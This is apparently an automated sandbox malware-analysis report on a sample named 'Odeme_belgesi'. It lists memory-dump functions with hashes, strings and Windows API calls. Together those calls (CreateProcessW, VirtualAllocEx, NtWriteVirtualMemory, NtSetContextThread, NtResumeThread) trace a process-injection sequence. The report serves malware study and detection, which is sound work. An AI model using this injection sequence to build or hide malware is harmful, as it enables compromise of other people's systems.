Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: Tezq$Tezq
API String ID: 0-356135718
Opcode ID: ae7b37305cea47324a092056548a94469977534360dba39a91e677250d7dd5e1
Instruction ID: 96835fc32a9fba0c2bd31bce55e7e9c27e616740e82208578e73727831a6cf90
Opcode Fuzzy Hash: ae7b37305cea47324a092056548a94469977534360dba39a91e677250d7dd5e1
Instruction Fuzzy Hash: 4281D4B8E042188FDF08CFA9C994A9EFBB6BF89304F10852AD916BB354D7705905CF50

Function 04FF6888 Relevance: 2.7, Strings: 2, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tezq, xrefs: 04FF6A85
Tezq, xrefs: 04FF68F1

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: Tezq$Tezq
API String ID: 0-356135718
Opcode ID: 671703c5b477abc3fb7e20360b521f9e619d5e3c8991ee5874b35a011c8d1bab
Instruction ID: b72b002d20c8ce29d145ff4fed0727512eab7e2818403b86ee10bbefb6e4fe87
Opcode Fuzzy Hash: 671703c5b477abc3fb7e20360b521f9e619d5e3c8991ee5874b35a011c8d1bab
Instruction Fuzzy Hash: 3C81E475E002199FDB08CFA9D984A9EFBB2FF88300F20852AD515BB364DB356906CF51

Function 028E2D89 Relevance: 2.6, Strings: 2, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

u6d`, xrefs: 028E2F5D
5jZy, xrefs: 028E2E02

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: 5jZy$u6d`
API String ID: 0-1818839043
Opcode ID: e7116431cb8e1244ed972ac01e4705b3ec77ec85fedbe7b0ba646085ae57188d
Instruction ID: 56a31579088ef433c84eec7b8d7fb8755493c9e3763d37477bb9e1ea2b87dfd9
Opcode Fuzzy Hash: e7116431cb8e1244ed972ac01e4705b3ec77ec85fedbe7b0ba646085ae57188d
Instruction Fuzzy Hash: DB511BB8E0421ACFDB08CFAAC5415AEFBF2EF89300F14D46AD916A7255D7345A42CF94

Function 0A6EC658 Relevance: 1.9, APIs: 1, Instructions: 397
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 0A6ECAA7

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 576c393ce210b02dac60ceef880dab8448aa082e11a44170f50e2f89447824e1
Instruction ID: 92aee8556a8d3a59f8a8f5a422fd66ad3e0222aaec3b3f58fdc9fceffd0b9249
Opcode Fuzzy Hash: 576c393ce210b02dac60ceef880dab8448aa082e11a44170f50e2f89447824e1
Instruction Fuzzy Hash: 4702CFB4E11228CFDB64CFA9D880B9DBBB1BF49304F1481AAE419B7350DB349985CF95

Function 0A6EC64F Relevance: 1.9, APIs: 1, Instructions: 387
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 0A6ECAA7

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 736834b2978011cf952e4110e94e11ba8de29c40ae51a2f8d6e690806afaef31
Instruction ID: 70957650ec0ce2fafbe7379b030999a95a336042dc0dbd57344c85df3f9aa9bf
Opcode Fuzzy Hash: 736834b2978011cf952e4110e94e11ba8de29c40ae51a2f8d6e690806afaef31
Instruction Fuzzy Hash: 00F1CEB4E11228CFDB64CFA9C884B9DBBB1BF49304F1481AAE419B7350DB349985CF95

Function 04FF87F8 Relevance: 1.7, Strings: 1, Instructions: 410
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

n5_B, xrefs: 04FF896A

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: n5_B
API String ID: 0-2112625008
Opcode ID: 19a4d4466ffa5d02f079426f80543b5fc6f9167aa0d5eeaabfa1fd752d802356
Instruction ID: 9d20fd120baa1b794fa761603d2572d8430e2d9e6b74d075e9cd405088bb890c
Opcode Fuzzy Hash: 19a4d4466ffa5d02f079426f80543b5fc6f9167aa0d5eeaabfa1fd752d802356
Instruction Fuzzy Hash: C9F1A271E04206DFCB14DF99C8909AEFBB2FF85380F159559CA02AB225D734A943CF91

Function 0A6ED6A1 Relevance: 1.6, APIs: 1, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0A6ED778

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: c5f199e95c107c9485745fb657a0e81c920dc42ae7adad4de90eb5f5a3b37bc1
Instruction ID: 493bfc475cfba1138ae5fcdcb64bbd81e68402243dedfef1dc95a631cf40a7c3
Opcode Fuzzy Hash: c5f199e95c107c9485745fb657a0e81c920dc42ae7adad4de90eb5f5a3b37bc1
Instruction Fuzzy Hash: 0341ABB5D012589FCF00CFA9D984AEEFBF1FB49314F24902AE818B7250D738AA45CB54

Function 0A6ED6A8 Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0A6ED778

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: d40effd160bd678462f499cb09178b8bcd7219ad14905ec44a58783ffd2c535b
Instruction ID: 16a6e077c4d3a3b96fae5601803cc499648ce854762bac71ad49d1439d336f2a
Opcode Fuzzy Hash: d40effd160bd678462f499cb09178b8bcd7219ad14905ec44a58783ffd2c535b
Instruction Fuzzy Hash: B4419AB5D012589FCF00CFA9D984AEEFBF1BB49310F24942AE819B7250D739AA45CF54

Function 0A6ED2C8 Relevance: 1.6, APIs: 1, Instructions: 109nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0A6ED382

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: d9a7bf83fc3f1f2504070bfd36489549dc33d59064e516c9d348f6eb4345d75b
Instruction ID: 2e4e9eae2d4faa7dd920a0395dc1b277ddde488533328debd7a842c1238730b2
Opcode Fuzzy Hash: d9a7bf83fc3f1f2504070bfd36489549dc33d59064e516c9d348f6eb4345d75b
Instruction Fuzzy Hash: 444198B5D05258DFCF10CFAAD880AEEFBB1BB49310F14942AE819B7200D739A945CF64

Function 0A6ED2D0 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0A6ED382

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: ed4b04b977f4208f269cbb61a54f5efca3a42fe57308a44e15ce16465457b29c
Instruction ID: 8a0825d3fadfda179f0728af54c229660952d10545aa0c106f2b8163aefe3bf4
Opcode Fuzzy Hash: ed4b04b977f4208f269cbb61a54f5efca3a42fe57308a44e15ce16465457b29c
Instruction Fuzzy Hash: CC41A9B4D00258DFCF10CFAAD880AEEFBB1BB49310F14942AE815B7200C739A945CF64

Function 0A6ED7F9 Relevance: 1.6, APIs: 1, Instructions: 96nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL(?,?), ref: 0A6ED8AF

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: bc0d61312f6a717853d508e8945521b7fdf6a6203cd66102d954e9f2e3482bbf
Instruction ID: 8819e1ad742a2da8ac4d039f38e25983efb09bf2d17d6cbc889be78126ca51c5
Opcode Fuzzy Hash: bc0d61312f6a717853d508e8945521b7fdf6a6203cd66102d954e9f2e3482bbf
Instruction Fuzzy Hash: A941BBB4D01258DFDB10CFA9D884AEEBBF1BF49314F24802AE419B7240D738A945CF54

Function 0A6ED800 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL(?,?), ref: 0A6ED8AF

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: d4bfd680eb47a5301b43d8850f131679fc33739800a5bda108fbf424e191271e
Instruction ID: 09429f0934042451226a03afee6e32d526af4290363dd28f30b2a7350c54161f
Opcode Fuzzy Hash: d4bfd680eb47a5301b43d8850f131679fc33739800a5bda108fbf424e191271e
Instruction Fuzzy Hash: B0319AB4D01258DFDB14CFAAD984AEEBBF1BF49314F14802AE419B7240D738A945CF54

Function 0A6ED480 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0A6ED511

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 12d6a9449f081025385f4d3be0d107abe748f4b8da0723d37e818735ae0009a8
Instruction ID: 391ef7a48dcfff694440094f1a5e57d409638800520513b4fffb58091ec3ad8a
Opcode Fuzzy Hash: 12d6a9449f081025385f4d3be0d107abe748f4b8da0723d37e818735ae0009a8
Instruction Fuzzy Hash: 1A31A8B4D01218DFCB20CFA9D980AAEBBF1BB59314F24942AE815B7300C739A946CF54

Function 0A6ED488 Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0A6ED511

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9c871b04a3cd91f9357209448bcb0065a85de004ba31fb37275e4f7e06e742b4
Instruction ID: ea345ae7f086b341de25f36c822b1e83d5d4bd17758dfcc8fb706840b348bc6f
Opcode Fuzzy Hash: 9c871b04a3cd91f9357209448bcb0065a85de004ba31fb37275e4f7e06e742b4
Instruction Fuzzy Hash: A631A7B4D01218DFCB10CFA9D980AAEFBF5FB49314F10942AE815B7200C739A946CFA4

Function 028E4685 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

;kyw, xrefs: 028E4986

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: ;kyw
API String ID: 0-1919984221
Opcode ID: 884fcf08b55ae30b79c816edb43be2078d4a5cf50475c83e6705a2bec821eaa9
Instruction ID: b6019ece614e27ac57ad1d4f4cb958b79860915582267cae18f6528e94026457
Opcode Fuzzy Hash: 884fcf08b55ae30b79c816edb43be2078d4a5cf50475c83e6705a2bec821eaa9
Instruction Fuzzy Hash: 65D190B8D0420ADFCB04CFA5C4818AEFBF2FF8A305B559555C41AEB215D7359A82CF94

Function 028E46D0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

;kyw, xrefs: 028E4986

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: ;kyw
API String ID: 0-1919984221
Opcode ID: f16e5e6a4d161a36d3bc9637062d30d3368382563d2d2adc423b08259e56feb7
Instruction ID: 49d21b9c9ca56b41307d90a0bb324ef22d65dc92556b2fdd25ae16672d11f907
Opcode Fuzzy Hash: f16e5e6a4d161a36d3bc9637062d30d3368382563d2d2adc423b08259e56feb7
Instruction Fuzzy Hash: 2FD13DB8D0020ADFCF04CF95C4818AEFBF2FF8A345B559559D41AAB214D735AA82CF94

Function 04FF88F0 Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

n5_B, xrefs: 04FF896A

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: n5_B
API String ID: 0-2112625008
Opcode ID: ac866a09cd14ca4f91afc802d12b36ebc05deddc392baa2053e00640d9f4a99b
Instruction ID: da1f6015fb8b71ef905bc83754dcfa9ff7f78502bf56a82c450a10a05de4e504
Opcode Fuzzy Hash: ac866a09cd14ca4f91afc802d12b36ebc05deddc392baa2053e00640d9f4a99b
Instruction Fuzzy Hash: 48D14B71E0120ADFCB04DF95C9808AEFBB2FF88740F14D559D516AB225D734AA42CF95

Function 04FF5BF8 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

p, xrefs: 04FF5D3D

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: 608ca9e4c3e467c589b74a28dd46ecaeed49cd2e15c2bd29e576175e97404972
Instruction ID: a336a44769632bc1b026cbd32256cec01a6d05e5a6464126379b27caf03780fe
Opcode Fuzzy Hash: 608ca9e4c3e467c589b74a28dd46ecaeed49cd2e15c2bd29e576175e97404972
Instruction Fuzzy Hash: 87619FB1914559DFD714CF99D840ABAB7BAFFCA306F1080ABD80AAA162DB305553CF60

Function 028EBCF8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

fg, xrefs: 028EBE44

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: fg
API String ID: 0-1332240855
Opcode ID: 23df6d519b251680f45f7d9ba27b0b4ce029318ca081f1a5c6ca4571cd9251d2
Instruction ID: f6635a52c16d334683d2b8f1fc44af9abaed47a33dbb02ad85fefcf558d4718f
Opcode Fuzzy Hash: 23df6d519b251680f45f7d9ba27b0b4ce029318ca081f1a5c6ca4571cd9251d2
Instruction Fuzzy Hash: DD6114B8E05219DFCF04CFA5D5846AEFBB2FF8A304F109929D426AB250DB746945CF50

Function 04FF4D68 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

<, xrefs: 04FF4E9D

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 4786502500b4df5eb5dd41db42cc9331bb18b6e32ed28ea6b4a429f31a76bece
Instruction ID: 2e3836a7aa1b3b9c77e9c47eac55e3213b094bdff1be1381852eac19292d59ca
Opcode Fuzzy Hash: 4786502500b4df5eb5dd41db42cc9331bb18b6e32ed28ea6b4a429f31a76bece
Instruction Fuzzy Hash: 79618875E00618CFDB58CFAAC9446DDBBF2BF89300F14C1AAD508AB265EB345A85CF50

Function 028E08E0 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

<, xrefs: 028E0A15

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 1cc28ec282a414178d4d832ebdbc1b59116378471ab97ef9bddb15b3a2f0835f
Instruction ID: f36e6796f20e2fffe09a40dfa3f45601cbb4bec0ca728464d27141de506338e1
Opcode Fuzzy Hash: 1cc28ec282a414178d4d832ebdbc1b59116378471ab97ef9bddb15b3a2f0835f
Instruction Fuzzy Hash: 7A619574E01658CFDB58CFAAC9446DDBBF2AF89301F14C0AAD409AB325DB345A81CF00

Function 028E6D50 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

, xrefs: 028E6DD5

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b77d39a067c3693ec3072ca48de4a31db6d4e0af2b8101846559fbc747471ad3
Instruction ID: ca09819e032215ab7f4164239e973173e12e04b2bcaf6d73bb42a90f3e2ecbb1
Opcode Fuzzy Hash: b77d39a067c3693ec3072ca48de4a31db6d4e0af2b8101846559fbc747471ad3
Instruction Fuzzy Hash: E1211B75E046188FEB58CF6BD84069EFBF7AFC9200F04C1BAC408AA224EB3019468F51

Function 0A6E25D8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35bdd90912369ce15287dcc3c4dac0571a060a8d2cbd54b0ddd4d0667cd7847d
Instruction ID: 11b10c8ad150e6b7ae50f2f183304ab25f98ec1ba586e2727565fd6109a70640
Opcode Fuzzy Hash: 35bdd90912369ce15287dcc3c4dac0571a060a8d2cbd54b0ddd4d0667cd7847d
Instruction Fuzzy Hash: 40B11374E16218DFCF28CFA5D8846DDFBB6FF89300F14952AD409AB258E73499428F24

Function 0A6E2D52 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fef8403d5839bb42bde23482889341f1a41fa16f9b3a676b09006c7b0ed8122
Instruction ID: 6f5537e92a2eb41637aed766698f699630660e8329423be7f7920a945fd5a46d
Opcode Fuzzy Hash: 6fef8403d5839bb42bde23482889341f1a41fa16f9b3a676b09006c7b0ed8122
Instruction Fuzzy Hash: 34C10274E052189FCB64CFA8D8946DEBBF2FF49300F2081AAD519AB355DB349A41CF51

Function 04FF6FA0 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b019b862b9dfccb687ae22ea249cc10f207e961152bdb47f529a1fc6f2dfa70b
Instruction ID: 62b8d0d7b7868f424118bad7e07fb38e6db50a2aa5ab623581605a157b57f13d
Opcode Fuzzy Hash: b019b862b9dfccb687ae22ea249cc10f207e961152bdb47f529a1fc6f2dfa70b
Instruction Fuzzy Hash: DF510A71E0420ACFCB08DF99D8405AEFBF2EF89301F14D46AD519A7265E7349A42CF95

Function 04FF6FE0 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8797a5d15e52c566abdaca144908a46b7a4236971df92fe6e7cf55efeb5b36a3
Instruction ID: 3bb8541dc832eca14d8302696472ffc4ad77cd86d9fae095e0d4603a63ae9016
Opcode Fuzzy Hash: 8797a5d15e52c566abdaca144908a46b7a4236971df92fe6e7cf55efeb5b36a3
Instruction Fuzzy Hash: 96510C71E042098FDB08DFEAD9405AEFBF2EF89300F14D46AD519A7265E7349A428F94

Function 028E3811 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c65580fc5c59077deba92ef9d9a206cbf8919fae06ef8ae13baf4af71fca22
Instruction ID: c05e121f8f152d465c0c02b44b2f0c64fabfcaf3cccbe752fb002ba6d0346e04
Opcode Fuzzy Hash: 54c65580fc5c59077deba92ef9d9a206cbf8919fae06ef8ae13baf4af71fca22
Instruction Fuzzy Hash: EB312975E01658CFDB18CFAAD9446DEBBB3AFC9300F14C0AAD409AB264DB345956CF40

Function 04FF79F9 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd283b9ee4c61058f9fb282a63d2e2bcb9092585c8c87095e90b5fff624dbaa6
Instruction ID: 5a0a7e10b5d1d1f2dbbfd35e1c8a6e0e4df753579e9fc493ace7b710bef0ae56
Opcode Fuzzy Hash: dd283b9ee4c61058f9fb282a63d2e2bcb9092585c8c87095e90b5fff624dbaa6
Instruction Fuzzy Hash: AE31C971E006188BDB18CF9AD9447DEFBF7AFC8300F14C16AD509AA264DB741A55CF80

Function 028E17FF Relevance: 1.6, APIs: 1, Instructions: 118
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 028E18DF

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0b93d8b9de9d09eabc2fff5f9096c37c4b486399120b6b06fe949979e0d76de7
Instruction ID: da09f3ac9fbb6209a8d1ea8529ac0e6d36ef55a16f1d430c1ee6d5c3405cff14
Opcode Fuzzy Hash: 0b93d8b9de9d09eabc2fff5f9096c37c4b486399120b6b06fe949979e0d76de7
Instruction Fuzzy Hash: 2241EFB8D042989FCB10CFA9D584AEEFFF0BF1A310F14949AE894B7211C735A945CB64

Function 0A6ED580 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A6ED632

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6ce01ac9e52865da8e452518bc61a8498354e4b0424cc88f72aeb532f1469c88
Instruction ID: 854c69af850f9098fb8122ce14c93deed902a0e963490b64b532dfaba0d6fd42
Opcode Fuzzy Hash: 6ce01ac9e52865da8e452518bc61a8498354e4b0424cc88f72aeb532f1469c88
Instruction Fuzzy Hash: 5E3197B8D01258DFCF10CFA9D980AEEFBB1BB59310F14942AE819B7210D735A942CF64

Function 0A6ED588 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A6ED632

Memory Dump Source

Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: add0588721cfa5cb421c619ad1947f05a29f9a97a212c50c2645b7e4105d63f9
Instruction ID: 6e527d75b87fae8bb69be628dcc0f9190040f4c106161e124392e0f421c38ddf
Opcode Fuzzy Hash: add0588721cfa5cb421c619ad1947f05a29f9a97a212c50c2645b7e4105d63f9
Instruction Fuzzy Hash: 073188B8D01258DFCF10CFA9D980A9EFBB5BB59310F10942AE815B7210D735A942CF54

Function 028E9FF8 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 028EA09F

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d3e81dd02e5cdbdea967e748230e6a221c5fef1705cb4275f329296c206965a3
Instruction ID: bafbe329c886e69044ec36c8f174f8b03e8f047a3c884748a210f08b3c25a830
Opcode Fuzzy Hash: d3e81dd02e5cdbdea967e748230e6a221c5fef1705cb4275f329296c206965a3
Instruction Fuzzy Hash: ED3186B9D002589FCF14CFA9D980AEEFBB5AB19310F24902AE815B7210D379A945CF64

Function 028E1838 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 028E18DF

Memory Dump Source

Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 666dd101298a46b01c231f0fbec385c5f1955fd539092bbd69ee4259ebc0c89b
Instruction ID: 276c8ba0feaf9008c654530396566a3357479a0e5226e8ebb978e97899f432fd
